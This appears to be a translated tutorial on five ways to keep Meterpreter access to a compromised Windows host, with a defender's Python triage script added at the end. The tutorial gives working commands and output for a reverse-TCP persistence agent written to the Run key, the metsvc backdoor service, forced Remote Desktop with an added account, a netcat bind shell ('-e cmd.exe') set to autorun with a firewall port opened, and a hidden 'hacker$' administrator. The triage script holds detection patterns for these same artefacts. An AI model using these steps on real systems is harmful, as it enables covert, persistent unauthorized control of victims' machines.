Several ways to maintain persistent Meterpreter access

Once Meterpreter has a shell, how do you keep control of the target host, i.e. have it connect back to the attacking host automatically after a reboot or at the next boot, without having to re-exploit it every time to obtain a Meterpreter session?

1. Using the persistence script

# -X start automatically at boot
# -i interval (seconds) between payload reconnect attempts
# -p port for the reverse connection
# -r IP address for the reverse connection
#
# For more options see the help: run persistence -h
#
meterpreter > run persistence -X -i 5 -p 4444 -r 192.168.3.12
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf5/logs/persistence/EVAN_20160604.3957/EVAN_20160604.3957.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.3.12 LPORT=4444
[*] Persistent agent script is 148461 bytes long
[+] Persistent Script written to C:\DOCUME~1\wangjun\LOCALS~1\Temp\VKZehDGmg.vbs
[*] Executing script C:\DOCUME~1\wangjun\LOCALS~1\Temp\VKZehDGmg.vbs
[+] Agent executed with PID 3892
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\UymiaoVKhfXxH
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\UymiaoVKhfXxH

2. Using the metsvc service

Running "run metsvc" registers Meterpreter as a service in the target host's service list, started automatically at boot. Running "run metsvc -r" uninstalls the Meterpreter service from the target host.

meterpreter > run metsvc
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\DOCUME~1\wangjun\LOCALS~1\Temp\PCDqsWgh...
[*]  >> Uploading metsrv.x86.dll...
[*]  >> Uploading metsvc-server.exe...
[*]  >> Uploading metsvc.exe...
[*] Starting the service...
      * Installing service metsvc
  * Starting service
Service metsvc successfully installed.

3. By enabling Remote Desktop

# Force-enable Remote Desktop on the target host and add a user named metasploit with password meterpreter
run getgui -u metasploit -p meterpreter
# The command above generates a Ruby cleanup script at /root/.msf4/logs/scripts/getgui/clean_up_xxxxx.rc
# When you are done with the target, run that script to remove traces: it disables the Remote Desktop service and deletes the created user
run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up_xxxxx.rc

4. Using nc (netcat)

# Upload nc.exe to the target host
meterpreter > upload /root/Desktop/nc.exe c:\\windows\\system32
# Enumerate the registry autorun entries
meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
# Add nc.exe as a registry autorun entry
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'c:\windows\system32\nc.exe -Ldp 455 -e cmd.exe'
# Query the value to confirm nc has been added to the autorun entries
meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
# Drop into a cmd shell on the target system
meterpreter > execute -f cmd -i
# Show the target system's current firewall mode
c:\Document and Setting\rush\Desktop > netsh firewall show opmode
# Add the port nc listens on to the target system's firewall rules
c:\Document and Setting\rush\Desktop > netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL
# Show which ports the target system's firewall has opened
c:\Document and Setting\rush\Desktop > netsh firewall show portopening
 
# Back on the attacking host, connect to the target with nc to get a shell
nc -v 192.168.0.3 455

5. Creating a hidden user on the target host

# Create the user (note the $ at the end of the user name, which hides the account from normal user listings)
c:\Document and Setting\rush\Desktop > net user hacker$ hacker /add
# Add the created user to the administrators group
c:\Document and Setting\rush\Desktop > net localgroup administrators hacker$ /add
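As an added defender-side example (not part of the original post), the script below triages the artefacts the five techniques above leave behind: a Run-key value that launches a script from a Temp directory or binds nc.exe to cmd.exe, a service named metsvc, and a local account ending in "$". It runs over constructed sample data; the sample Run-key values, service names and account names are assumptions modelled on the output shown in the post, not data from a real host.

```python
# Added example, not from the original post: triage of persistence artefacts.
# On a real host the inputs would come from exporting the Run key, the service
# list and the local account list; here they are constructed samples.
import re

# Constructed samples modelled on the post's output (assumption, not real data).
RUN_KEY_VALUES = {
    "UymiaoVKhfXxH": r"C:\DOCUME~1\wangjun\LOCALS~1\Temp\VKZehDGmg.vbs",
    "nc": r"c:\windows\system32\nc.exe -Ldp 455 -e cmd.exe",
    "OneDrive": r"C:\Users\wangjun\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background",
}
SERVICES = ["Dhcp", "metsvc", "Spooler"]
LOCAL_USERS = ["Administrator", "Guest", "wangjun", "hacker$"]

TEMP_DIR = re.compile(r"\\(temp|tmp)\\", re.IGNORECASE)
SCRIPT_EXT = re.compile(r"\.(vbs|js|wsf|hta|ps1|bat)\b", re.IGNORECASE)
# netcat invoked with -e/-c handing a shell to whoever connects
NC_SHELL = re.compile(
    r"\bnc(?:at)?(?:\.exe)?\b.*\s-[a-z]*[ec]\s+\S*(cmd|powershell|sh)", re.IGNORECASE)

def check_run_key(values):
    """Return (value name, reasons) for Run-key entries matching the post's patterns."""
    findings = []
    for name, cmd in values.items():
        reasons = []
        if TEMP_DIR.search(cmd):
            reasons.append("launches from a Temp directory")
        if SCRIPT_EXT.search(cmd):
            reasons.append("runs a script file at logon")
        if NC_SHELL.search(cmd):
            reasons.append("netcat bound to a shell (-e cmd.exe)")
        if reasons:
            findings.append((name, reasons))
    return findings

def check_services(names):
    """metsvc is the service name the post shows 'run metsvc' installing."""
    return [s for s in names if s.lower() == "metsvc"]

def check_hidden_users(names):
    """Accounts ending in '$' are hidden from normal 'net user' listings."""
    return [u for u in names if u.endswith("$")]

def triage(run_values=RUN_KEY_VALUES, services=SERVICES, users=LOCAL_USERS):
    """Run all three checks and collect the hits per artefact type."""
    return {"run_key": check_run_key(run_values),
            "services": check_services(services),
            "hidden_users": check_hidden_users(users)}

if __name__ == "__main__":
    for section, hits in triage().items():
        print(section, hits)
```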
